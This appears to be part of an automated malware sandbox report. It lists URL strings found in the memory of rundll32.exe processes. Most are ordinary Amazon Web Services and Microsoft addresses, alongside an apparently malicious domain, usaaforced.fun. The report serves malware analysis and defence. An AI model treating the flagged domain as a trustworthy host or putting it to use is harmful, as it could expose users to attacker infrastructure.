Source: rundll32.exe, 00000003.00000002.2499572164.00000000000F9000.00000004.00000020.sdmp	String found in binary or memory: http://usaaforced.fun/Q
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp	String found in binary or memory: http://usaaforced.fun/k
Source: rundll32.exe, 00000003.00000002.2500139731.0000000001CE7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2184373019.0000000001CA7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2178409552.0000000001EF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2500122657.0000000001DB7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2501158491.0000000002DB0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2501033372.0000000002C60000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: rundll32.exe, 00000003.00000002.2499932403.0000000001B00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2184161879.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2178177559.0000000001D10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2499918134.0000000001BD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2500139731.0000000001CE7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2184373019.0000000001CA7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2178409552.0000000001EF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2500122657.0000000001DB7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2499932403.0000000001B00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2184161879.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2178177559.0000000001D10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2499918134.0000000001BD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000007.00000002.2499918134.0000000001BD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://x.ss2.us/x.cer0&
Source: rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/aws-blog/1.0.46/js
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/da/js/1.0.47/aws-da.js
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/g11n-lib/2.0.67
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.376
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.376/style-awsm.css
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svg
Source: rundll32.exe, 00000003.00000003.2110513457.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174357995.0000000000436000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logo
Source: rundll32.exe, 00000007.00000003.2174357995.0000000000436000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logoo
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.png
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-search/1.0.13/js
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra/1.0.376/directories
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra/1.0.376/libra-cardsui
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra/1.0.376/libra-head.js
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra/1.0.376/librastandardlib
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/plc/js/1.0.108/plc
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/pricing-calculator/js/1.0.2
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/psf/null
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.js
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/target/1.0.113/aws-target-mediator.js
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: https://amazon.com/
Source: rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: https://amazon.com/vt2
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://amazonwebservicesinc.tt.omtrdc.net
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/?nc1=h_ls
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/?nc2=h_lg
Source: rundll32.exe, 00000007.00000003.2225040318.00000000003B7000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/H
Source: rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: https://aws.amazon.com/Ht2
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ar/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ar/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/cn/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/cn/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/de/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/de/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/es/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/es/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/fr/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/fr/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/id/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/id/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/it/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/it/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/jp/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/jp/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2110327677.00000000000F8000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/k
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ko/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ko/?nc1=h_ls
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_mo
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_ql_mp
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/marketplace?aws=hp
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/podcasts/aws-podcast/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/privacy/?nc1=f_pr
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/pt/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/pt/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ru/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ru/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/search
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/search/
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/search/?searchQuery=
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/terms/?nc1=f_pr
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/th/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/th/?nc1=f_ls
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/tr/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/tr/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/tw/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/tw/?nc1=h_ls
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/vi/
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/vi/?nc1=f_ls
Source: rundll32.exe, 00000003.00000003.2346923026.00000000000D8000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/wzx4
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/?nc2=h_m_mc
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/billing/home?nc2=h_m_bc
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/console/home
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/console/home?nc1=f_ct&src=footer-signin-mobile
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/support/home/?nc1=f_dr
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/support/home/?nc2=h_ql_cu
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/support/home?nc2=h_ql_cu
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp	String found in binary or memory: https://d1.awsstatic.com
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=3038&fmt=gif
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://devices.amazonaws.com?hp=tile&so-exp=below
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://docs.aws.amazon.com/index.html?nc2=h_ql_doc
Source: rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://i18n-string.us-west-2.prod.pricing.aws.a2z.com
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://pages.awscloud.com/AmazonECSAnywherePreview.html?hp=tile&so-exp=below
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://pages.awscloud.com/communication-preferences?trk=homepage
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://pages.awscloud.com/fico-case-study.html?hp=tile&story=fico
Source: rundll32.exe, 00000003.00000003.2110269066.0000000002C01000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://pages.awscloud.com/zillow-case-study?hp=tile&story=zllw
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://phd.aws.amazon.com/?nc2=h_m_sc
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default
Source: rundll32.exe, 00000003.00000002.2501076885.0000000002C00000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default&sc_icampaign=
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&src=default
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&src=default
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://portal.aws.amazon.com/gp/aws/manageYourAccount?nc2=h_m_ma
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: https://press.aboutamazon.com/press-releases/aws
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174367394.0000000000443000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://s0.awsstatic.com
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.html
Source: rundll32.exe, 00000003.00000003.2110319662.000000000015C000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp	String found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html
